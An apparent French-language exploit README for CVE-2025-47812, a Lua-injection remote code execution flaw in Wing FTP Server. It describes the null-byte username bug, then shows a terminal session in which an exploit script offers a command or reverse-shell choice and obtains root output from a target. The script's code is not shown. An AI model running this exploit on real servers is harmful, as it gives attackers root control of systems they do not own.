
CVE-2025-47812
CVE-2025-47812 est une vulnérabilité critique d'exécution de code à distance (RCE) affectant Wing FTP Server dans les versions antérieures à 7.4.4. Elle a été découverte par un chercheur en sécurité et il a été confirmé qu'elle est activement exploitée dans la nature.
La vulnérabilité se situe dans la logique d'authentification de Wing FTP Server, plus précisément dans la manière dont il gère les octets nuls (\0) dans le paramètre username.
Les attaquants peuvent injecter du code Lua arbitraire via le champ du nom d'utilisateur, que le serveur écrit dans le fichier de session. Lorsque ce fichier de session est traité ultérieurement, le code Lua injecté est exécuté, permettant aux attaquants d'exécuter des commandes au niveau du système.
/loginok.html accessible aux réseaux non fiables.┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
Cet exploit est fourni à des fins éducatives uniquement. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous disposez d'une autorisation explicite de test. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil.